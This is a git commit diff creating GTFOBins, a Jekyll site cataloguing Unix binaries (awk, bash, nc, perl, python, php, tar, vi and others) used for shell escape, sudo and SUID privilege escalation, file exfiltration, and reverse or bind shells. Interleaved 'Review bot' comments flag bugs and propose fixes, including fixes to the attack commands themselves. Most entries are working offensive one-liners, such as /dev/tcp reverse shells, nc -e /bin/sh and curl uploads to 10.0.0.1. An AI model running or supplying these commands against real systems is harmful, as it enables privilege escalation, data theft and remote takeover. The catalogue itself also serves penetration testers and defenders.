First commit

This commit is contained in:
Emilio Pinna 2018-05-21 20:14:41 +01:00
commit b81e57005a
57 changed files with 1082 additions and 0 deletions

3
.gitignore vendored Normal file

@ -0,0 +1,3 @@
/_tmp/
/.sass-cache/
/_site/

3
CONTRIBUTING.md Normal file

@ -0,0 +1,3 @@
# Contributing
TODO link to website URL

3
Gemfile Normal file

@ -0,0 +1,3 @@
source 'https://rubygems.org'
gem 'jekyll'
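Review bot: `gem 'jekyll'` carries no version constraint, so a future `bundle update` can move to a new major release of Jekyll (which changes plugin loading and `exclude` semantics) without a deliberate decision. The lockfile pins 3.8.1 today, but the intent belongs in the manifest too: `gem 'jekyll', '~> 3.8'`. Apply the same to any plugin gems added later.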

63
Gemfile.lock Normal file

@ -0,0 +1,63 @@
GEM
remote: https://rubygems.org/
specs:
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
colorator (1.1.0)
concurrent-ruby (1.0.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
eventmachine (1.2.7)
ffi (1.9.23)
forwardable-extended (2.6.0)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.8.1)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-watch (2.0.0)
listen (~> 3.0)
kramdown (1.16.2)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
pathutil (0.16.1)
forwardable-extended (~> 2.6)
public_suffix (3.0.2)
rb-fsevent (0.10.3)
rb-inotify (0.9.10)
ffi (>= 0.5.0, < 2)
rouge (3.1.1)
ruby_dep (1.5.0)
safe_yaml (1.0.4)
sass (3.5.6)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
PLATFORMS
ruby
DEPENDENCIES
jekyll
BUNDLED WITH
1.16.1

10
Makefile Normal file

@ -0,0 +1,10 @@
.PHONY: serve bundle
serve:
bundle exec jekyll serve
serve-public:
bundle exec jekyll serve --host 0.0.0.0
bundle:
bundle install
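Review bot: The `serve-public` target binds Jekyll's development server to every interface, and that server is a convenience tool rather than something hardened for untrusted networks. A one-line comment above the target makes the trade-off explicit to whoever runs it on a laptop with a public-facing interface, e.g. `# exposes the dev server on all interfaces; use only on a trusted network`. The `serve` target, bound to localhost, should remain the documented default.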

3
README.md Normal file

@ -0,0 +1,3 @@
# GTFOBins
TODO link to website URL

15
_config.yml Normal file

@ -0,0 +1,15 @@
title: GTFOBins
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
permalink: pretty
collections:
gtfobins:
output: true
defaults:
- scope:
path: '_gtfobins'
values:
layout: bin
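Review bot: The `exclude` list omits `Gemfile.lock`, and in Jekyll 3.x a user-supplied `exclude` appears to replace the built-in default list rather than extend it, so the lockfile and its full dependency inventory would be copied into `_site` and published — please verify against a built `_site`. The leading-slash form (`'/Gemfile'`) also differs from the bare names Jekyll's own defaults use; if those entries are not matching, all four files are being published as well. Suggested: `exclude: ['Gemfile', 'Gemfile.lock', 'Makefile', 'README.md', 'CONTRIBUTING.md']`.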

39
_data/functions.yml Normal file

@ -0,0 +1,39 @@
exec-interactive:
label: Interactive
description: It executes interactive commands that may be exploited to break out from restricted shells.
exec-non-interactive:
label: Non-interactive
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
suid-enabled:
label: SUID
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor.
suid-limited:
label: Limited SUID
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux.
sudo-enabled:
label: Sudo
description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`.
download:
label: Download
description: It can download remote files.
upload:
label: Upload
description: It can exfiltrate files on the network.
bind-shell:
label: Bind shell
description: It can bind a shell to a local port to allow remote network access.
reverse-shell:
label: Reverse shell
description: It can send back a reverse shell to a listening attacker to open a remote network access.
load-library:
label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context.
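Review bot: The `suid-limited` description has a typo and a garbled possessive: `tipically` should be `typically`, and `the default operating systems system shell` reads as `the operating system's default shell`. Suggested second sentence: `Its functioning depends on the operating system's default shell and typically works only on Debian Linux.` This text is rendered verbatim on the functions page, so the wording is user-facing.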

9
_gtfobins/awk.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
---

40
_gtfobins/bash.md Normal file
View File

@ -0,0 +1,40 @@
---
functions:
exec-interactive:
- code: bash
sudo-enabled:
- code: sudo bash
suid-enabled:
- code: ./bash -p
upload:
- description: Send local file in the body of an HTTP POST request.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
- description: Send local file using a TCP connection.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
cat $LFILE > /dev/tcp/$RHOST/$RPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_get
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
- description: Fetch remote file using a TCP connection.
code: |-
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_get
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
reverse-shell:
- code: |
RHOST=127.0.0.1
RPORT=8000
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
---
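Review bot: The `download` example labelled "Fetch remote file using a TCP connection" (`bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE`) does not fetch a file: it starts an interactive bash with stdin attached to the socket, so whatever the peer sends is executed as commands and the trailing `> $LFILE` only captures their output. A plain read of the socket is what the description promises: `cat < /dev/tcp/$RHOST/$RPORT > "$LFILE"`. Separately, `$LFILE` is unquoted throughout the file, and the reverse-shell example uses `RHOST=127.0.0.1` where the other examples use the `10.0.0.1` placeholder.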

9
_gtfobins/csh.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: csh
sudo-enabled:
- code: sudo csh
suid-enabled:
- code: ./csh -b
---

15
_gtfobins/curl.md Normal file

@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send local file with an HTTP POST request.
code: |
URL=http://10.0.0.1/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
curl $URL -o $LFILE
---
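Review bot: The `upload` example references `$file_to_send`, which is never set; the variable defined two lines above is `LFILE`, so curl posts an empty body. It should read `curl -X POST -d @"$LFILE" $URL`. Note also that `-d @file` strips carriage returns and newlines from the file; `--data-binary @"$LFILE"` sends the content byte-for-byte, which is what an exfiltration example wants.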

15
_gtfobins/ed.md Normal file

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
ed
!/bin/sh
sudo-enabled:
- code: |
sudo ed
!/bin/sh
suid-limited:
- code: |-
./ed
!/bin/sh -p
---

9
_gtfobins/emacs.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
---

9
_gtfobins/env.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh
suid-enabled:
- code: ./env /bin/sh -p
---

9
_gtfobins/expect.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: expect -c 'spawn /bin/sh;interact'
sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact'
suid-enabled:
- code: ./expect -c 'spawn /bin/sh -p;interact'
---

9
_gtfobins/find.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: find . -exec /bin/sh \; -quit
sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit
suid-enabled:
- code: ./find . -exec /bin/sh -p \; -quit
---

23
_gtfobins/ftp.md Normal file

@ -0,0 +1,23 @@
---
functions:
exec-interactive:
- code: |
ftp
!/bin/sh
sudo-enabled:
- code: |
sudo ftp
!/bin/sh
upload:
- description: Send local file to a FTP server.
code: |
RHOST=10.0.0.1
ftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=10.0.0.1
ftp $RHOST
get file_to_get
---

7
_gtfobins/gdb.md Normal file

@ -0,0 +1,7 @@
---
functions:
exec-interactive:
- code: gdb -nx -ex '!sh' -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit
---

9
_gtfobins/ionice.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: ionice /bin/sh
sudo-enabled:
- code: sudo ionice /bin/sh
suid-enabled:
- code: ./ionice /bin/sh -p
---

10
_gtfobins/ld.so.md Normal file

@ -0,0 +1,10 @@
---
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
functions:
exec-interactive:
- code: /lib/ld.so /bin/sh
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh
suid-enabled:
- code: ./ld.so /bin/sh -p
---
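Review bot: The `suid-enabled` example depends on the preamble that `_layouts/bin.html` prepends to SUID examples (`cp $(which ld.so) .`), but as the description itself says the loader is not a regular binary on `PATH` — on glibc systems it typically lives under `/lib` or `/lib64` as `ld-linux*.so*` — so `which ld.so` resolves to nothing and the copy step fails. Consider a description that tells the reader how to locate it (the `ldd /bin/sh` output shows the path) and an example that copies that explicit path instead.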

18
_gtfobins/less.md Normal file

@ -0,0 +1,18 @@
---
functions:
exec-interactive:
- code: |
less /etc/profile
!/bin/sh
- code: |
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v
sudo-enabled:
- code: |
sudo less /etc/profile
!/bin/sh
suid-limited:
- code: |-
./less /etc/profile
!/bin/sh -p
---

15
_gtfobins/man.md Normal file

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
man man
!/bin/sh
sudo-enabled:
- code: |
sudo man man
!/bin/sh
suid-limited:
- code: |-
./man man
!/bin/sh -p
---

15
_gtfobins/more.md Normal file

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
TERM= more /etc/profile
!/bin/sh
sudo-enabled:
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh
suid-limited:
- code: |-
TERM= ./more /etc/profile
!/bin/sh -p
---
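Review bot: The `sudo-enabled` example relies on `sudo -E` to carry the empty `TERM` across, but `-E` is only honoured when the sudoers policy permits environment preservation (a rule lacking `SETENV` that is not `ALL` makes sudo refuse with an error instead of running `more`). Being allowed to run `more` via sudo does not imply that permission, so the dependency should be stated in the description, e.g. `description: Requires sudoers to allow preserving the environment (-E).`, or the example should drop `-E` if the escape works regardless — worth verifying on a stock Debian/Ubuntu.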

25
_gtfobins/nc.md Normal file

@ -0,0 +1,25 @@
---
functions:
upload:
- description: Serve a file on a TCP port.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
download:
- description: Fetch remote file from a remote TCP port.
code: |-
LPORT=8000
LFILE=file_to_get
nc -l -p $LPORT > "$LFILE"
reverse-shell:
- code: |
RHOST=10.0.0.1
RPORT=8000
nc -e /bin/sh $RHOST $RPORT
bind-shell:
- code: |
LPORT=8000
nc -lp $LPORT -e /bin/sh
---
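Review bot: The `upload` example's description ("Serve a file on a TCP port") contradicts its code, which connects out to `$RHOST:$RPORT` and streams the file to the listener; the listening side is the `download` example. Suggested: `description: Send local file to a listening TCP port.` Also, `-e` (used by both shell examples) exists only in some netcat flavours (nc.traditional, ncat); OpenBSD nc, the default on current Debian and Ubuntu, has no `-e`, so per the contribute guidelines that limitation belongs in the description.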

14
_gtfobins/perl.md Normal file

@ -0,0 +1,14 @@
---
functions:
exec-interactive:
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=12346
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
---
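Review bot: The `suid-enabled` example (`./perl -e 'exec "/bin/sh";'`) is missing `-p`: every other `suid-enabled` entry execs `/bin/sh -p` because bash drops the effective uid when it differs from the real uid unless `-p` is given, so as written this yields an unprivileged shell. It should be `./perl -e 'exec "/bin/sh -p";'`. Minor: the reverse shell uses `RHOST=127.0.0.1` / `RPORT=12346` where the other entries use the `10.0.0.1` / `8000` placeholders.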

39
_gtfobins/php.md Normal file

@ -0,0 +1,39 @@
---
functions:
exec-non-interactive:
- code: |
export CMD="ls /"
php -r 'system($_ENV["CMD"]);'
- code: |
export CMD="ls /"
php -r 'passthru($_ENV["CMD"]);'
- code: |
export CMD="ls /"
php -r 'print(shell_exec($_ENV["CMD"]));'
- code: |
export CMD="ls /"
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
- code: |
export CMD="ls /"
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
- code: |
export CMD="ls /"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
---
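Review bot: The fourth `exec-non-interactive` example is not valid PHP as written: inside the shell's single quotes no escaping happens, so PHP receives `print(join(\"\\n\",$r));` and fails to parse on `\"`. The single-quoted shell string can carry the double quotes verbatim, `php -r '$r=array(); exec($_ENV["CMD"], $r); print(join("\n",$r));'`, and PHP then interprets `\n` inside its own double-quoted string. The neighbouring examples already use that form.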

32
_gtfobins/python2.md Normal file

@ -0,0 +1,32 @@
---
functions:
exec-interactive:
- code: python -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python -c 'import os; os.system("/bin/sh")'
suid-enabled:
- code: ./python -c 'import os; os.system("/bin/sh -p")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
python -m SimpleHTTPServer $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
---
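Review bot: The file is named `python2.md`, so the bin page renders `python2` and the SUID preamble in `_layouts/bin.html` copies `$(which python2)` to `./python2`, yet every example invokes `python`, and the `suid-enabled` one runs `./python`, which the preamble never creates. Either rename the file to `python.md` or invoke `python2` in the examples so the rendered page is internally consistent.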

32
_gtfobins/python3.md Normal file

@ -0,0 +1,32 @@
---
functions:
exec-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
suid-enabled:
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- description: Serve files in the local folder running an HTTP server.
code: |
LPORT=8888
python3 -m http.server $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
---
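Review bot: In the `upload` example, `open(e["LFILE"]).read()` opens the file in text mode, so any non-UTF-8 (binary) file raises `UnicodeDecodeError` before anything is sent; `open(e["LFILE"],"rb").read()` fixes it and `urlencode` accepts bytes values. The `bytes(... .encode())` wrapper is redundant because `.encode()` already returns bytes. Cosmetic: `u.urlretrieve (` in the `download` example has a stray space before the parenthesis.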

9
_gtfobins/rpm.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
---

9
_gtfobins/rpmquery.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
---

19
_gtfobins/ruby.md Normal file

@ -0,0 +1,19 @@
---
functions:
exec-interactive:
- code: ruby -e 'exec "/bin/sh"'
sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"'
reverse-shell:
- code: |
export RHOST=10.0.0.1
export RPORT=8000
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
load-library:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
---

36
_gtfobins/scp.md Normal file

@ -0,0 +1,36 @@
---
functions:
exec-non-interactive:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
scp -S $TF x y:
sudo-enabled:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
sudo scp -S $TF x y:
suid-limited:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
./scp -S $TF a b:
upload:
- description: Send local file to a SSH server.
code: |
RPATH=user@10.0.0.1:~/where_to_save
LPATH=file_to_send
scp $LFILE $RPATH
download:
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@10.0.0.1:~/file_to_get
LFILE=where_to_save
scp $RPATH $LFILE
---
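Review bot: The `upload` example sets `LPATH=file_to_send` but then runs `scp $LFILE $RPATH`, so `$LFILE` expands to nothing and scp is invoked with a single argument (usage error). It should be `scp $LPATH $RPATH`, or better, rename the variable to `LFILE` to match the `download` example and the rest of the corpus. The three `-S` examples also leave `$TF` behind in the temp directory; a trailing `rm "$TF"` keeps the technique tidy.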

9
_gtfobins/setarch.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: setarch $(arch) /bin/sh
sudo-enabled:
- code: setarch $(arch) /bin/sh
suid-enabled:
- code: ./setarch $(arch) /bin/sh -p
---
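Review bot: The `sudo-enabled` example is identical to the `exec-interactive` one and never invokes `sudo`, so it only yields the caller's own shell: it should read `sudo setarch $(arch) /bin/sh`. The `suid-enabled` line is fine as is.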

20
_gtfobins/ssh.md Normal file

@ -0,0 +1,20 @@
---
functions:
exec-interactive:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost /bin/bash --noprofile --norc
download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@10.0.0.1
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
HOST=user@10.0.0.1
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
---

9
_gtfobins/strace.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: strace -o /dev/null /bin/sh
sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh
suid-enabled:
- code: ./strace -o /dev/null /bin/sh -p
---

10
_gtfobins/tar.md Normal file

@ -0,0 +1,10 @@
---
functions:
exec-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
-p"
---
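Review bot: The `suid-limited` example's code is split across two lines inside a plain YAML scalar (`exec="/bin/sh` then `-p"`); YAML folds the continuation into a space so the result is `exec="/bin/sh -p"`, but it works only by the folding rule and is easy to break on the next edit. Keep it on one line: `./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"`.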

9
_gtfobins/taskset.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: taskset 1 /bin/sh
sudo-enabled:
- code: sudo taskset 1 /bin/sh
suid-enabled:
- code: ./taskset 1 /bin/sh -p
---

15
_gtfobins/tclsh.md Normal file

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
suid-enabled:
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
---

34
_gtfobins/telnet.md Normal file

@ -0,0 +1,34 @@
---
functions:
exec-interactive:
- code: |
RHOST=www.google.com
RPORT=80
telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
reverse-shell:
- code: |
RHOST=127.0.0.1
RPORT=8000
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
sudo-enabled:
- code: |
RHOST=www.google.com
RPORT=80
sudo telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
suid-limited:
- code: |
RHOST=www.google.com
RPORT=80
./telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
---
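Review bot: The three escape-to-shell examples point `RHOST` at `www.google.com`, which makes a local restricted-shell breakout depend on outbound Internet access and sends traffic to an unrelated third party; the other entries use the `10.0.0.1` placeholder. Using the placeholder (or any reachable host on the test network) keeps the examples consistent and self-contained. The `description: MacOS only.` key is placed after `code`; putting it before `code` matches the ordering used elsewhere in the corpus.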

15
_gtfobins/tftp.md Normal file

@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
get file_to_get
---

13
_gtfobins/vi.md Normal file

@ -0,0 +1,13 @@
---
functions:
exec-interactive:
- code: vi -c ':!/bin/sh'
- code: |
vi
:set shell=/bin/sh
:shell
sudo-enabled:
- code: sudo vi -c ':!/bin/sh'
suid-enabled:
- code: ./vi -c ':!/bin/sh -p'
---

15
_gtfobins/wget.md Normal file

@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
wget $URL -O $LFILE
---
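Review bot: The `upload` example embeds raw base64 in `--post-data`, which wget sends as `application/x-www-form-urlencoded`; base64 output contains `+`, `/` and `=`, and a standard form decoder turns `+` into a space, so the receiver reconstructs a corrupted file. Either percent-encode the value or skip the encoding step with wget's own file upload, `wget --post-file="$LFILE" $URL`, which sends the file contents as the request body.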

11
_gtfobins/wish.md Normal file

@ -0,0 +1,11 @@
---
functions:
exec-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr
---

9
_gtfobins/zsh.md Normal file

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: zsh
sudo-enabled:
- code: sudo zsh
suid-enabled:
- code: ./zsh
---

57
_includes/bin_table.html Normal file

@ -0,0 +1,57 @@
<input id="bin-search" type="text" placeholder="Filter by name, just start typing..."/>
<div id="bin-table-wrapper">
<table id="bin-table">
<thead>
<tr>
<th>Binary</th>
<th>Functions</th>
</tr>
</thead>
<tbody>
{% for file in site.gtfobins %}
<tr>
<td><a href="{{ file.url }}" class="bin-name">{% include get_bin_name path=file.path %}</a></td>
<td>{% include function_list.html bin=file %}</td>
</tr>
{% endfor %}
</tbody>
<tfoot>
<tr><td id="search-message" colspan="2">No binary matches...</td></tr>
</tfoot>
</table>
</div>
<script>
var searchBox = document.querySelector('#bin-search');
var searchMessage = document.querySelector('#search-message');
searchMessage.style.display = 'none';
// ensure height during filtering
var binTableWrapper = document.querySelector('#bin-table-wrapper');
binTableWrapper.style.height = binTableWrapper.clientHeight + 'px';
searchBox.addEventListener('input', function () {
var query = searchBox.value.toLowerCase().trim();
var noResults = true;
document.querySelectorAll('#bin-table tbody tr').forEach(function (row) {
var binName = row.firstElementChild.firstElementChild.innerText;
if (binName.indexOf(query) !== -1) {
row.style.display = '';
noResults = false;
} else {
row.style.display = 'none';
}
});
searchMessage.style.display = noResults ? '' : 'none';
});
addEventListener('keydown', function (event) {
if (event.key.toLowerCase().match(/^[a-z]$/)) {
searchBox.focus();
}
});
</script>
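Review bot: The global `keydown` handler focuses the search box on any single-letter key, including chords such as Ctrl+C / Cmd+C: `event.key` for those is still `c`, so focus moves to the input (and the user's text selection is most likely lost) before the copy happens, on a page whose whole point is copy-pasting commands. Guard the shortcut with `if (!event.ctrlKey && !event.metaKey && !event.altKey && /^[a-z]$/.test(event.key.toLowerCase()))`. Checking `event.key` before calling `.toLowerCase()` on it also avoids a TypeError on browsers that do not populate it.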


@ -0,0 +1,6 @@
<ul class="function-list">
{% for function in include.bin.functions %}
{% assign type = function[0] %}
<li><a href="{{ include.bin.url }}#{{ type }}">{{ site.data.functions[type].label }}</a></li>
{% endfor %}
</ul>
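Review bot: `site.data.functions[type].label` renders an empty chip when a bin file uses a function key that is not declared in `_data/functions.yml` (a plausible typo such as `suid-enable`), which silently hides the mistake in both the table and the bin page. A fallback keeps the error visible: `{{ site.data.functions[type].label | default: type }}`.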


@ -0,0 +1,7 @@
<dl>
{% for function_pair in site.data.functions %}
{% assign function = function_pair[1] %}
<dt class="function-name">{{ function.label }}</dt>
<dd>{{ function.description | markdownify }}</dd>
{% endfor %}
</dl>

1
_includes/get_bin_name Normal file

@ -0,0 +1 @@
{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %}


@ -0,0 +1,6 @@
<h1>
{% if page.url != '/' %}
<a href="/">..</a> /
{% endif %}
{{ include.title }}
</h1>

46
_layouts/bin.html Normal file

@ -0,0 +1,46 @@
---
layout: common
---
{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %}
{% include page_title.html title=bin_name %}
